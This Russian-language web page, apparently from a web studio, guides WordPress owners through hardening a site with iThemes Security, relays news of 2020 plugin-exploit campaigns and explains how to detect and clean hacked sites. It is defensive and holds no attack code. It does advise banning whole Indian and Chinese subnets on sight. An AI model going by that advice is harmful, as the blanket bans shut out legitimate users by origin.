Есть более хитрые перцы. Они проверяют сайты не на уязвимости, а на уже установленные бэкдоры и шеллы. Это взломщики — паразиты второй волны.

Здесь как раз хорошо видно как происходит поиск доступов к шелам.

Особо интересен чудак с китая (1), который скачав диск по поиску уязвимостей (а они есть в доступности), не настроив ничего, начал с одного и того же IP пробивать сайт.

Следующим вариантом взлома сайта являются всевозможные SQL инъекции. Часть из них мы будем отсеивать, при настройке плагина, установив запрет на длинные строки.

Информации по взлому именно WordPress очень много в интернете. Есть куча обучающих пособий, сборок дисков с уже установленным и настроенным софтом.

В целом, понаблюдайте за собственным сайтом и вы порадуетесь тому, сколько раз на день его хотят взломать. А наше дело — этому помешать.

Защита Worpress сайта

Мы рассмотрим способы защиты сайта с использованием плагина iThemes Security (ранее известный как Better WP Security). Сразу скажу — он не панацея. Аккурат перед Новым Годом у меня было взломано 3 сайта, где стоял и работал этот плагин. Поэтому необходим комплексный подход к защите.

Если вы уверены, что ваш сайт не взломан, то:

  1. Сделайте полный бекап сайта: и базы данных и всех его файлов и сохраните его в надежное место.
  2. Обновите пароли у всех администраторов сайта.
  3. Удалите лишних пользователей.
  4. Обновите движок Вордпресса до актуального.
  5. Сократите список активированных плагинов, удалив те, функциями которых вы не пользуетесь.
  6. Подберите аналоги к плагинам, которые перестали обновляться и перейдите на них.
  7. Удалите «платные» плагины, которые вы не покупали, а скачали с интернета.
  8. Физически удалите все неактивированные плагины.
  9. Обновите все плагины.
  10. Удалите все неиспользуемые темы
  11. Перейдите на новую тему, если вы её не покупали, а скачали из интернета, а не из репозитория WordPress.
  12. Обновите тему до актуальной.

Далее, устанавливайте плагин iThemes Security и переходите к его настройке.

Настройка плагина iThemes Security

После его установки и активации запускайте модуль «Security Check» и жмите кнопку Secure Site — будет выполнена первоначальная настройка защиты.

Далее, сразу переходим в закладку Advanced. Там пять модулей, нам необходим «Спрятать страницу входа на сайт«.

Здесь включаем галку «Спрятать страницу входа на сайт» и ниже прописываем слуг, для входа на сайт. Например прописав «puzo1234», доступ к админке будем получать по адресу site.ru/puzo1234.

Остальное оставляем по умолчанию. Сохраняем настройки.

Этот модуль «Прячет страницу входа в систему (wp-login.php, wp-admin, admin и login), чтобы ее сложнее было найти при автоматизированной атаке на сайт». Таким образом мы немного защитились от брутфорса.

Возвращаемся к «рекомендованным» модулям. Запускаем модуль «Основные настройки«.

Здесь включаем флаг «Вносить изменения в файлы» — Allow iThemes Security to write to wp-config.php and .htaccess.»

Вообще, практически вся работа плагина заключается в поднастройке htaccess. То что раньше делалось руками, собирая информацию по защите Вордпресса на разных форумах, теперь несколько автоматизировано. Очень удобно.

Дальше спускаемся ниже и настраиваем модуль, как указано на рисунке.

Обязательно указываем свой IP адрес в белом списке блокировки, нажав кнопку «Add my current IP to the White List».

Оставляем остальное по умолчанию.

Сохраняем результаты и переходим к следующему модулю «Отслеживание ошибки 404«.

Здесь выставьте значения, как указано на рисунке ниже:

Порог ошибок (1) следует уменьшить, когда вы обнаружите, что ваш сайт пытаются взломать «перебором» уязвимости. Если вы уверены, что на вашем сайте нет 404 ошибок (провели технический аудит), то сразу снижайте порог. Чем меньше это значение, тем безопасней, но и тем больше вероятность забанить пользователя, который по непреднамеренной ошибке зашел куда-то ни туда.

Игнорирование типов файлов — это конечно брешь (2) в защите. Так, например, у меня сидел шелл зловреда в .ico файле.

Однако, если вы не делали шаблон сайта под «ретину», не настроили выдачу изображений удвоенной и утроенной плотности всем этим мобильным пользователям с яблочными телефонами и планшетами, то вы их сразу же всех перебаните (см рисунок ниже).

здесь какой- то товарищ с retina — дисплеем мобильного / планшета тщетно пытается запросить картинки удвоенной плотности (@2x.png). Но он обламывается, генерирует 404 ошибку и был бы забанен, если бы не исключения в настройках.

Далее идем в модуль «Заблокированные пользователи«. Выставляем значения следующим образом:

  1. Включаем «Черный список по умолчанию» — т.е. ставим галочку а поле  Включить черный список от сайта HackRepair.com
  2. Заполняем бан лист, собранными мною за этот месяц IP

Скачать список IP (январь 2018)

Жмите на кнопку выше, копируйте список IP и вставляйте его в поле «Запретить доступ хостам» модуля.

Далее вы ежедневно смотрите логи плагина и пополняйте список новыми IP, с которых вас пытаются взломать. Тут главное не перестараться и не забанить всех подряд, включая IP поисковых систем.

Отбор кандидатов на блокирование имеет следующую логику:

(1) — обращение к плагину, который у меня не установлен. Это, по всей видимости один из скомпрометированных плагинов, имеющих уязвимость. Поиск ведется перебором.

(2) Реферрер подделан — какой то site.ru

(3) Именно этот IP и добавляем в список блокировки. Нажав на него — можем посмотреть с какого прокси пришел этот запрос. Да, всякие индийские и китайские IP блокируем сразу же, всей подсетью, например прописав 67.227.*.* или, что то же-самое, прописав 67.227.0.0/16 — в аннотации CIDR.

Теперь посмотрите на (4). Здесь ищется ads.txt. Как вы знаете, это правила доступа к рекламной сети Google Adsense™‎. Поэтому данный IP мы блокировать не будем.

Переходим к модулю Local Brute Force Protection. Выставьте настройки, согласно следующего скрина:

Надеюсь, что ваш логин на вход в админку — не admin? Проверьте и поменяйте в настройках пользователя. Впрочем, дальше мы поднастроим так, чтобы входить только с e/mail. Это резко снизит эффектинвность брутфорса админки. С учетом того, что мы перенесли вход в новое место, которое не знают посторонние, брутфорс вам не особо грозит (в отличии от иных методов атаки).

Теперь подключим сетевую защиту. Для этого открываем модуль Network Brute Force Protection, получаем API, прописываем и активируем его. Этот метод защиты похож на методику определения спама Akismet — т.е. если какой то сайт пытались сломать с какого то IP, то он попадает в глобальную базу и если с этого IP попытаются получить доступ к вашему сайту, то он окажется заблокированным.

Переходим к следующему модулю «Тонкая подстройка системы«

Настраиваем модуль, согласно приведенному скрину.

Далее спускаемся чуть ниже и отключаем выполнение PHP в папке Upload. Ибо нечего там выполнять — там должны храниться изображения и/или документы, но никак не исполнимые файлы.

Переходим к последнему значимому блоку — Подстройка WordPress. Здесь включите следующие функции:

  • Ссылка для Windows Live Writer
  • Ссылка EditURI
  • Спам комментарий
  • Редактор файлов
  • XML-RPC — поставьте в положение «Отключить XML-RPC»
  • Множественные попытки авторизации запросом XML-RPC — в положение «Блокировать»
  • Сообщения при неудачной попытке входа
  • Отключает дополнительные пользовательские архивы
  • Login with Email Address or Username — в положение «e/mail address only» — теперь авторизироваться можно будет только по e/mail.

Остальные модули настраивайте по своему усмотрению.

Все работы вы выполняете на свой страх и риск. Обязательно делайте бэкапы сайта.

26
Янв
2018

  Посмотрите еще
  • Правильный Sitemap.xml для сайта
  • Пошаговый аудит контента
  • 15 шагов по улучшению качества сайта

Комментарии

Взлом WordPress. Атаки хакеров 2020 новые данные от xakep.ru

По информации от xakep.ru в плагине File Manager, которым пользуются более 700 000 ресурсов на базе WordPress, обнаружена опасная уязвимость, которая позволяет выполнять команды и вредоносные скрипты на уязвимых сайтах. Спустя всего несколько часов после раскрытия информации о баге эксперты из таиландской компании NinTechNet сообщили о первых атаках на эту уязвимость.

Суть проблемы заключается в том, что плагин содержит дополнительный файловый менеджер, известный как elFinder — это библиотека с открытым исходным кодом, которая обеспечивает работу основных функций плагина, а также предоставляет пользовательский интерфейс. Уязвимость возникает из-за того, как реализована имплементация elFinder в данном случае.

Так, в File Manager расширение файла библиотеки connector.minimal.php.dist изменено на .php, чтобы его можно было запускать напрямую, даже если файл connector не используется самим файловым менеджером. ­В такие библиотеки часто включены файлы примеров, которые не предназначены для использования прямо «из коробки», без настройки управления доступом. В итоге данный файл не имеет прямых ограничений доступа, а значит, к нему может получить доступ кто угодно. 

Исследователи NinTechNet пишут, что злоумышленники используют эксплоит для загрузки на сайты файлов изображений, в которых скрытых веб-шеллы. В итоге атакующие могут использовать удобный интерфейс, который позволяет им запускать команды в каталоге plugins/wp-file-manager/lib/files/, где находится плагин File Manager. И хотя проблема не позволяет хакерам выполнять команды вне названного каталога, атакующие могут нанести немалый ущерб, загрузив на уязвимый сайт скрипты, которые способны выполнять действия в других частях уязвимого ресурса.  

Не пропустите нашу новую публикацию, она поможет вам глубже изучить вопрос безопасности: Разбираемся, движок WordPress безопасен или нет?

По данным NinTechNet, в настоящее время хакеры используют баг для загрузки на сайты скрипта hardfork.php, а затем применяют его инъекций кода в скрипты /wp-admin/admin-ajax.php и /wp-includes/user.php. При этом отмечается, что злоумышленники стремятся защитить уязвимый файл паролем (connector.minimal.php), чтобы другие хак-группы не могли воспользоваться уязвимостью на уже зараженных сайтах. 

«В ближайшие несколько часов или дней мы увидим, что именно они будут делать дальше. Ведь если они защищают уязвимый файл паролем, чтобы предотвратить использование уязвимости другими хакерами, вероятно, они собираются вернуться и снова посетить зараженные ресурсы», — говорят специалисты NinTechNet. 

Эксперты из ИБ-компании Wordfence уже посвятили этой волне атак собственный отчет. За последние несколько дней компания заблокировала более 450 000 попыток эксплуатации данной уязвимости. Исследователи пишут, что злоумышленники пытаются внедрить на сайты различные файлы. В некоторых случаях эти файлы были пустыми (очевидно, хакеры лишь тестировали уязвимость), другие вредоносные файлы носили имена hardfork.php, hardfind.php и x.php. 

«Плагин файлового менеджера, подобный этому, позволяет злоумышленникам манипулировать файлами и загружать новые по своему выбору прямо из панели управления WordPress. Потенциально это также позволяет сразу повысить привилегии.

Например, злоумышленник может получить доступ к админке сайта, используя скомпрометированный пароль, затем получить доступ к уязвимому плагину и загрузить веб-шелл, чтобы выполнить дальнейшие действия на сервере и развить свою атаку с помощью другого эксплоита», — пишет специалистка Wordfence Хлоя Чемберленд (Chloe Chamberland). 

Проблема уже была исправлена в File Manager версий от 6.0 до 6.8. Официальная статистика WordPress показывает, что в настоящее время уязвимы примерно 52% установок плагина, то есть около 350 000 сайтов.

Не пропустите эту информацию — это действительно важно: Что делать если ваш сайт на WordPress испытывает техническую проблему?

Атаки хакеров начались 28 апреля 2020

Как сообщает эксперт по информационной безопасности компании Akamai Ларри Кэшдоллар (Larry Cashdollar) продолжается атака перебором паролей против WordPress, MySQL. Виредонос Stealthworker, активно используется для брутфорс-атак (перебором паролей) на популярные онлайн платформы.

Среди потенциальных объектов атак — сайты на WordPress, а так же Drupal, Bitrix, OpenCart, Magento и службы MySQL, PostgreSQL, SSH и FTP. Более ранние версии также атаковали phpMyAdmin.

Stealthworker попал в одну из специальных ловушек (Honeypot), которая представляет собой установку WordPress с легко угадываемым административным паролем. Ждать атак долго не пришлось: после успешного взлома злоумышленники установили в систему новую тему WordPressAlternateLite. Кроме нее, обнаружился двоичный процесс, работающий как www-user и резко вырос сетевой трафик.  

AlternateLite— одна из множества бесплатных тем WordPress, установленная более чем на 1000 сайтов. Stealthworker — не первый и явно не последний инструмент подобного рода. Если он продемонстрирует эффективность выше среднего, скорее всего, количество подобных ему вредоносов будет расти, говорит Михаил Зайцев, эксперт по информационной безопасности

Хотим поделиться с вами ценной информацией, узнайте, какие 10 лучших плагинов безопасности WordPress мы применяем для защиты сайтов

Не ждите когда вас взломают!

Закажите апгрейд вашего сайта на WordPress прямо сейчас!

Оставить заявку

Новость от cnews.ru на 28 мая: уже миллион сайтов на WordPress атакован с 24 тыс. IP-адресов

Злоумышленники ведут серийный «обстрел» сайтов на базе WordPress в надежде найти и скомпрометировать уязвимые. В прицеле – старые, давно не обновлявшиеся плагины с XSS-уязвимостями.

Хакеры пытаются перенаправить пользователей на сторонние вредоносные ресурсы или подсадить бэкдор. Атаки осуществлялись как минимум с 24 тыс. адресов. Атаки начались 28 апреля 2020 г.; к 3 мая количество предпринятых попыток атаковать сайты на WordPress перевалило за 20 млн.

«Вероятнее всего, злоумышленники ведут «ковровую бомбардировку» в надежде зацепить уязвимый ресурс, — говорит Алексей Водясов, эксперт по информационной безопасности компании SEC Consult Services. — КПД у этой кампании вряд ли очень высокий: как видно, не так много сайтов содержат уязвимые плагины. Хотя нельзя исключать, что вышеприведенным списком мишени не ограничиваются. В любом случае, администраторам ресурсов рекомендуется произвести у себя весеннюю уборку, обновить все плагины и избавиться от не поддерживаемых».

Если вы заметили, что ваш сайт взломали, значит ему нужна Надежная защита и обслуживание сайта на WordPress, обращайтесь в веб-студию АВАНЗЕТ, будем рады помочь. Для защиты сайтов наших клиентом мы применяем 10 лучших плагинов безопасности WordPress

Информация от xakep.ru на 28 апреля: 

Специалисты Wordfence обратили внимание, что некая хак-группа развернула масштабную кампанию против сайтов на WordPress. Используя различные известные уязвимости, злоумышленники предприняли попытки атак на почти миллион ресурсов за прошедшую неделю. 

Атаки начались 28 апреля 2020 года и привели к тридцатикратному увеличению объема вредоносного трафика, отслеживаемого компанией. Группировка использует для атак более 24 000 различных IP-адресов и уже попыталась взломать более 900 000 сайтов под управлением WordPress. Атаки достигли своего пика в прошлое воскресенье, 3 мая 2020 года, когда хакеры предприняли более 20 000 000 попыток взлома 500 000 различных доменов. 

Ценные рекомендации в новой статье: Надежная защита и обслуживание сайта на WordPress

Исследователи пишут, что в основном группировка полагается на эксплуатацию разнообразных XSS-уязвимостей и с их помощью  внедряет вредоносный JavaScript-код на сайты, а затем перенаправляет входящий трафик ресурсов на вредоносные сайты.­  Также используемая злоумышленниками малварь проверяет, не вошел ли посетитель как администратор, чтобы с помощью его учетной записи попытаться автоматически создать бэкдор.  

Wordfence рассказывает, что злоумышленники применяют в своей кампании следующие уязвимости:

  • XSS-уязвимость в плагине Easy2Map, который был удален из репозитория WordPress еще в августе 2019 года. Попытки эксплуатации этой уязвимости составляют более половины от общего числа атак, хотя плагин установлен менее чем на 3000 сайтах;
  • Уязвимость XSS в плагине Blog Designer,­ которая была исправлена в 2019. Данные плагин используется примерно 1000 ресурсов, но эта уязвимость уже использовалась в ходе других вредоносных кампаний;
  • Баг в плагине WP GDPR Compliance, исправленный в конце 2018 года. Помимо прочего, проблема позволяла злоумышленникам изменять домашний URL сайта. Хотя данный плагин насчитывает более 100 000 установок, аналитики подсчитали, что в настоящее время лишь 5000 из них по-прежнему уязвимы.
  • Уязвимость в плаигне Total Donations, позволяющая изменять домашний URL сайта. Данный плагин был удален с Envato Marketplace в начале 2019 года, и в настоящее время насчитывается менее 1000 «живых» установок.
  • XSS-уязвимость в теме Newspaper, которая была исправлена ​​в далеком 2016 году. В прошлом эту проблему тоже эксплуатировали хакеры.

Также, по мнению экспертов Wordfence, в будущем стоящая за атаками группировка может разработать новые эксплоиты и расширить свой арсенал, что повлечет за собой атаки и на другие уязвимости на сайты на WordPress.

Источник: xakep.ru

Вашему сайту требуется поддержка, обслуживание, хостинг?

Напишите нам прямо сейчас, всегда рады помочь!

Оставить заявку

← Поделиться с друзьями !

Если сайт WordPress взломан, что делать и как проверить?

Ваш сайт ведет себя странно, появился спам или вредоносная реклама?
Или, возможно, вы потеряли доступ к своему сайту WordPress? Или Google заблокировал ваш сайт и он более не доступен в поиске? Если Ваш сайт на WordPress взломан. Как проверить и что делать? Это уже хорошо, потому что Вы точно теперь знаете, что ваш сайт надо лечить и восстанавливать. Большинство владельцев зараженных сайтов даже и не догадываются, что сайт давно является источником вирусов и несет угрозу для каждого, кто его посетит. В мире насчитывается более 18 млн. зараженных сайтов и лишь 15-20% из них попадают в черный список Гугл и блокируются. Остальные продолжают свою работу. 

Скорее всего Ваш сайт взломан.

Более того — наверняка это случилось очень давно, так как вирусы и вредоносные программы, попавшие на сайт часто долго дремлют и не показывают своей активности. Хакерам для своих целей и задач — нужно как можно больше одновременно зараженных сайтов. Несколько сайтов с вредоносным кодом не помогут хакерам проводить свои массовые атаки и распространять свой вирус далее по сети.
Да и если Гугл и другие браузеры уже отреагировали на ваш зараженный сайт путем блокировки его, это точный показатель, что заражение сайта произошло довольно давно, потому что поисковой системе нужно не мало времени, чтобы обнаружить вредоносный код на сайте. Хакеры могут здорово навредить вашему бизнесу в интернете, начиная от простой спам-рекламы до перенаправления ваших пользователей на другие небезопасные ресурсы.

После обнаружения чего, Гугл отправит Ваш сайт в черный список и заблокирует его показ в поиске. При переходе на сайт браузер будет блокировать вход, выдавая предупреждение об опасности, а провайдер хостинга вышлет вам предупреждение и ограничит доступ к сайту до полного удаления вредоносного кода. Даже если у вас подключен SSL сертификат и сайт работает через HTTS.


Что необходимо сделать чтобы вылечить свой сайт?

Первое — перестать нервничать) — Ваш сайт можно вылечить. Начнем с обычной, более точной проверки сайта на взлом и наличие вирусов.
Как проверить, что мой сайт взломан?
Начнем с признаков взлома сайта:

    1. — Появились всплывающие окна на сайте, которые не были созданы вами или вашей командой.
    2. — Ваш сайт перенаправляет пользователей на другой вам  неизвестный сайт.
    3. — Спам-реклама на вашем веб-сайте с контентом для взрослых, наркотиками, азартными играми или другой любой незаконной деятельностью.
    4. — Ваш сайт ранжируется по ключевым словам спама в Google Analytics или другом инструменте аналитики.
    5. — Ваши посетители блокируются в браузере с предупреждением от Google: «Сайт содержит вредоносное ПО
    6. — Вы получили электронное письмо от вашего веб-хостинга, что на вашем сайте присутствует вредоносный код.
      Эти признаки указывают на взлом, хотя надо признаться, что иногда это бывает ложной тревогой. Поэтому обязательно необходимо убедится в этом и тщательно проверить сайт.

Самый простой и эффективный способ — использовать сканер вредоносных программ.

Хороший онлайн сканер автоматически показывает вредоносный код. Самый сложный и рискованный способ проверки сайта WordPress, — это сделать ручную проверку. Это опасно, потому что вы будете взаимодействовать с файлами и папками  WordPress. Способы, как проверить взломан ли ваш сайт:

1. Сканирование вашего сайта с помощью сканера вредоносных программ

Один вариантов сканеров — MalCare — сканер вредоносных программ.

  1. — Установить плагин безопасности MalCare на свой веб-сайт.
  2. — Затем в панели инструментов вашего сайта (в админке) выберите MalCare .
  3. — На странице MalCare введите URL-адрес веб-сайта и бесплатно запустите сканирование на наличие вредоносных программ. Если он обнаружит, что ваш сайт взломан, вы получите уведомление с количеством и месторасположением найденных зараженных файлов.

2. Проверьте Google Search Console на наличие «проблем безопасности»

Поисковая консоль Google помогает отслеживать трафик и производительность вашего веб-сайта. Он также предупреждает вас, если обнаружит какие-либо проблемы безопасности на вашем сайте. Это означает, что если на вашем сайте есть вредоносная программа, консоль поиска обнаружит ее. Что нужно сделать:

  1. — Войдите в свою учетную запись Google Search Console . 
  2. — В меню слева выберите пункт «Вопросы безопасности» .
  3. — Если ваш сайт взломан, вы увидите предупреждение о том, что  на сайте обнаружено нежелательное программное обеспечение . Очень важно: вам необходимо настроить консоль поиска Google, чтобы она могла обнаруживать проблемы с безопасностью. Для этого необходимо, если Вы еще не делали этого пройти этап подтверждения владения сайтом.

3. Проверьте свой сайт с помощью инструмента безопасного просмотра Google

Вставьте адрес своего сайта (домен) WordPress в инструмент безопасного просмотра Google,  и он покажет вам проблемы, обнаруженные на сайте, если такие есть. Инструмент довольно надежный, потому это от самого Google. Он проверит ваш сайт на наличие вредоносных программ и, обнаружив, сообщит вам об этом.

4. Проверьте предупреждения от провайдеров хостинга, поисковых систем и браузеров.

Если ваш сайт WordPress взломан (и вы не знаете что делать и как проверить), вполне вероятно, что вы получили предупреждающие письма или уведомления от вашего хостинг-провайдера. Поисковые системы и интернет-браузеры, такие как Google, Yahoo и Bing, также будут отображать предупреждающие сообщения на вашем сайте и в результатах поиска, чтобы предупредить посетителей о том, что ваш сайт взломан. То есть Вы потеряете свои показатели в поисковой выдаче и ваш сайт может полностью исчезнуть на время с поиска Google. 

Хостинг провайдер

Хостинг-провайдеры обслуживают тысячи сайтов. Чтобы обеспечить безопасность своей платформы, они сканируют все веб-сайты, которые они размещают, на необходимость поиска возможных вредоносных действий. Один взломанный веб-сайт может негативно повлиять на другие веб-сайты на платформе хостинга и поставить под угрозу целый бизнес провайдера.
Поэтому, когда они обнаруживают взломанный веб-сайт, они  немедленно приостанавливают учетную запись хостинга и выдают владельцу сайта уведомление об исправлении веб-сайта. Чтобы узнать, обнаружил ли ваш хостинг-провайдер взлом, проверьте свою электронную почту или уведомления на панели управления вашей учетной записью в кабинете провайдера в своей учетной записи.

Поисковые системы

Как и хостинг провайдеры, поисковые системы также регулярно сканируют сайты на наличие вредоносных программ. Обнаружив взломанный сайт, они заносят его в черный список и ограничивают пользователям просмотр сайта. Взломанные сайты подвергают своих пользователей риску,  заставляют их загружать вредоносное программное обеспечение или делиться своей конфиденциальной информацией. Примерно так будет выглядеть страница в браузере для пользователя, который пытается открыть зараженный сайт.

 Чтобы узнать, находится ли ваш сайт в черном списке, вам нужно:
— откройте браузер в режиме инкогнито и откройте https://www. google.com/.
— затем поместите адрес своего сайта (домен) в поиск Google и нажмите Enter
— перейдите по любой ссылке, которую вы увидели в результатах поиска, которая ведет на одну из ваших страниц сайта. Не забудьте перед этим выйти из админ панели Вашего сайта.

Если ваш сайт занесен в черный список, Google запретит вам доступ к нему и Вы увидите одно из сообщений:
    • — Сайт содержит вредоносное ПО
    • — Опасность фишинговой атаки
    • — Вы посещаете фишинговый сайт

Если сайт в черном списке — это верный признак взломанного сайта.

Интернет браузеры

Как и веб-хостинг поисковые системы, интернет-браузеры также заинтересованы в защите своих пользователей. Если они обнаруживают взломанный сайт, они пытаются запретить пользователям посещать сайт. Они делают это, отображая предупреждения в результатах поиска. Например, в Google Chrome вы увидите такое предупреждение: «Этот сайт возможно был взломан» или «Этот сайт может нанести вред вашему компьютеру»

5. Вручную изучить зараженные файлы (опасно)

Когда хакеры проникают на ваш сайт, они вносят изменения на вашем сайте. Чаще всего они пытаются сделать это так, чтобы не быть обнаруженными, чтобы они могли и далее продолжать использовать ресурсы вашего сайта в течение длительного времени. Они прячут вредоносные программы в местах, где вы вряд ли сможете их найти, таких как критические файлы WordPress, с которыми обычно никто не хочет возиться. Если ваш сайт взломан, есть большая вероятность, что хакер спрятал вредоносное ПО в таких файлах. Их изучение поможет вам выяснить, действительно ли ваш сайт взломан.

Но будьте осторожны. Обработка важных файлов WordPress — дело рискованное. Одна ошибка может сломать весь ваш сайт, поэтому сохраните резервную копию сайта перед этим (часто такая возможность есть в вашем личном кабинете хостинга). Мы рекомендуем вам пропустить этот метод, если вы не разработчик или не разбираетесь во внутренней работе CMS WordPress.
Какие файлы и папки требуют особого внимания:
— папка плагинов и тем
— htaccess
— wp-config
Откройте эти файлы и найдите ключевые слова в них, такие как, например «eval» или «base64_decode», они часто являются частью вредоносного ПО.

Как исправить взломанный сайт
Теперь, когда вы обнаружили, что ваш сайт взломан, его необходимо почистить и вылечить. Чем дольше ваш сайт будет взломан, тем больше будет ущерб.
Существуют различные способы очистки вашего сайта, однако мы рассмотрели только самый эффективный способ — использование плагина безопасности для CMS WordPress. Это один из самых простых и надежных способов для обычного пользователя.
Один из плагинов —  удаление вредоносных программ MalCare, способный очистить сайт от вирусов за 5 минут.
Что нужно сделать:
— просканировать сайт на наличие вирусов или вредоносного кода. Плагин сделает это автоматически перед установкой.
— после найдите кнопку “Автоочистка”
— после обновления MalCare немедленно начнет чистку вашего сайта.

Обнаружение и устранение уязвимости, вызвавшей взлом

Очистка вашего сайта — это всего лишь половина работы. После вам необходимо выявить и устранить уязвимости, которые позволили хакерам взломать ваш сайт и заразить его. А поиск уязвимостей часто лучше доверить профессионалам в кибербезопасности, так как обычному пользователю будет просто недостаточно навыков и знаний для этого. Например заказать услугу круглосуточной защиты сайта от Datami.ua

Существует два распространенных типа уязвимостей, которые вызывают взлом.
Первый — это уязвимые плагины и темы, слабые учетные данные .
Что нужно сделать: обновить или удалить уязвимые плагины и темы. Устаревшие плагины и темы могут быть уязвимы и могут быть использованы для проникновения на ваш сайт. Поэтому мы рекомендуем вам обновить все устаревшее программное обеспечение,  которое включает в себя не только плагины и темы, но и целое ядро ​​WordPress . Если вы используете пиратские темы и плагины (обычно взломанные кем-то когда-то и непонятно где), мы настоятельно рекомендуем  деактивировать и удалить  их со своего веб-сайта.
Пиратское программное обеспечение обычно заражено вредоносным ПО, которое при установке на веб-сайте WordPress позволяет хакерам получить доступ к вашему сайту.

Второй: используйте надежное имя пользователя и пароль

Один из самых распространенных методов взлома веб-сайтов хакерами — это атаки методом «грубой силы» . В этом типе атаки они используют ботов, чтобы попытаться угадать правильную комбинацию имен пользователей и паролей, чтобы получить доступ к вашему сайту. Сайты с легко угадываемыми именами пользователей (например, admin, John, user и т. Д.)  И паролями (например, password123, admin1234, user1234)  легко взломать за несколько минут.

Как удалить сайт из черного списка Google и возобновить хостинг

Если ваш веб-сайт занесен в черный список, вы должны сообщить Google, что вы очистили свой веб-сайт, чтобы они могли приступить к удалению из черного списка. Вам нужно будет отправить сайт на проверку и наше руководство по удалению черного списка Google , который поможет вам в этом.

И если ваш сайт приостановлен, вам нужно будет связаться с вашим хостинг-провайдером и сообщить им, что вы очистили свой сайт. Они проверят, так ли это на самом деле.
После того, как вы предприняли все вышеперечисленные шаги по исправлению вашего сайта, осталось сделать только одну очень важную вещь. Вы должны убедиться, что ваш сайт никогда более не будет взломан.

Защитите свой сайт от взлома
Чтобы защитить сайт WordPress от будущих попыток взлома, мы настоятельно рекомендуем вам установить плагин безопасности WordPress, который выполняет 3 основных задачи: сканирование, очистка и защита веб-сайта.  Если вы установите плагин безопасности на свой сайт, он будет сканировать ваш сайт каждый день и очищать его. Если ваш сайт взломан — принимать меры для защиты вашего сайта от попыток взлома в будущем. Вы можете выбрать плагин безопасности сайта из нашего списка из лучших WordPress плагин безопасности.

Со временем каждая тема или плагин получают уязвимости WordPress . Чтобы исправить это, разработчики быстро выпускают новые обновления, чтобы устранить уязвимости. Поэтому своевременное обновления крайне важно для безопасности сайта. Узнайте, как безопасно обновить ваш сайт . 

Скачивать темы и плагины только с доверенных сайтов

Многие используют пиратские темы и плагины. Потому что это бесплатно, но в конце концов это будет дороже. 

Большинство пиратских плагинов или тем содержат вредоносные программы. Поэтому, когда вы устанавливаете и активируете пиратское программное обеспечение на своем веб-сайте, вредоносное ПО также активируется вместе с ним. Вредоносный код действует как бэкдор,  который дает хакерам доступ к вашему сайту. Более того, пиратское (взломанное) программное обеспечение для WordPress не получает обновлений от разработчиков. Когда в программном обеспечении обнаруживается уязвимость, без его обновления невозможно исправить программное обеспечение. А ПО не обновляется. Лучше всего избегать использования пиратских тем WordPress и плагинов на вашем сайте. Используйте плагины и темы только с официального сайта WordPress или надежных торговых площадок, таких как ThemeForest, CodeCanyon, Evanto и др.

  • Дополнительная внутренняя защита сайта

    WordPress рекомендует  принять определенные меры для усиления безопасности вашего сайта. Для реализации этих мер вам необходимо иметь технические знания для работы с WordPress. Работа со взломанным сайтом — это дорого, долго и очень затратно по времени. Важно обеспечить меры безопасности на вашем сайте до того, как его могут взломать. Один из лучших способов сделать это — подключить круглосуточную защиту сайта от всех возможных угроз. Он сканирует ваш сайт ежедневно и предупреждает вас, когда обнаруживает подозрительные действия на вашем сайте.

  • Ваш Datami.ua.

Что такое взлом WordPress Redirect и как его удалить

Iпредставьте себе это — после месяцев настойчивых и непрерывных усилий, когда ваш веб-сайт, наконец, начинает показать SEO-результаты, ваши посетители перенаправляются на другие сайты.

Что еще хуже, эти перенаправления ведут на вредоносные и нелегальные веб-сайты. Помимо серьезного ущерба репутации вашего бренда и доверия клиентов, это также ставит под угрозу их безопасность. К сожалению, только так WordPress Malware Redirect, один из самых распространенных взломов WordPress, работает. 

В этой статье вы узнаете больше об этой вредоносной программе, о том, как вы можете исправить ее на своем сайте и что вы можете сделать, чтобы защитить свой сайт в будущем. Давайте начнем. 

Каковы общие симптомы перенаправления вредоносных программ?

Основной целью вредоносного ПО WordPress Redirect является перенаправление посетителей на спамовые или фишинговые веб-сайты для создания ложных рекламных показов. 

Как вы подтверждаете, что ваш веб-сайт действительно был заражен вредоносным ПО? Помимо жалоб от ваших клиентов, вот некоторые общие симптомы:

  • Вы получаете жалобы от ваших клиентов, которые перенаправляются на другой внешний веб-сайт.
  • Ваш веб-сайт помечен Google как спам или даже занесен в черный список.
  • Ваша домашняя страница содержит автоматические push-уведомления, которые вы не добавили.  
  • Файлы index.php и .htaccess в основной установке WP содержат неопознанный вредоносный код JavaScript.
  • ВЕСЬ Ваш WordPress Хостинг сервер содержит много ненужных файлов с подозрительными именами файлов.
  • Вы можете найти вредоносный код в файлах header.php и footer.php установленных файлов тем, которые перенаправляют ваших посетителей на другие домены, такие как default7.com или test246.com.

Хотя диагностировать эту вредоносную программу довольно просто, сложнее ее исправить. Это связано с тем, что хакеры продолжают внедрять инновации для разработки новых и более скрытных вариантов, которые по-разному влияют на разные части вашего веб-сайта, что значительно затрудняет их обнаружение. 

Это вредоносное ПО также создает учетные записи пользователей WP с правами администратора, поэтому удаление этого вредоносного ПО с вашего веб-сайта имеет решающее значение. Что подводит нас к следующей части — как вы можете очистить свой сайт, чтобы избавиться от этого взлома.  

Как взлом перенаправления влияет на ваш сайт 

Хотя это может показаться очевидным, вот лишь несколько способов, которыми этот хак может подорвать ваш бизнес:

  • Значительная потеря трафика и вовлеченности из-за потери трафика
  • Ущерб вашей с трудом заработанной онлайн-репутации и доверию к бренду — ваши перенаправленные посетители вряд ли когда-либо вернутся.
  • Влияние на ваш Google SEO рейтинг – приводит к большей потере входящего трафика 
  • Дополнительное время простоя — после приостановки вашего веб-хостинга или занесения в черный список поисковой системой Google.
  • Заблокирован доступ к вашему Администратор WP приборной панели, которая может помешать вам действовать быстро.

Как удалить взломанное вредоносное ПО Redirect

Существуют как ручные, так и автоматические методы удаления вредоносного ПО Redirect с вашего сайта. 

Ты можешь сделать это:

  • Использование плагина
  • Использование ручного метода

Использование плагина безопасности WordPress

Это более простой и надежный метод. Плагины безопасности, такие как Sucuri и MalCare, имеют усовершенствованные алгоритмы, предназначенные для обнаружения новейших вариантов вредоносных программ, которые хорошо замаскированы хакерами.

Они выполняют глубокое автоматическое сканирование через определенные промежутки времени, поэтому вы можете принять меры до того, как будет нанесен слишком большой ущерб. 

 

(Источник: MalCare)

 

Например, вы можете использовать подключаемый модуль безопасности MalCare для сканирования и даже удаления вредоносных программ с вашего сайта за несколько кликов и менее чем за десять минут.

Вот как:

Во-первых, зарегистрироваться на MalCare и установить плагин на вашем сайте с панели инструментов MalCare.

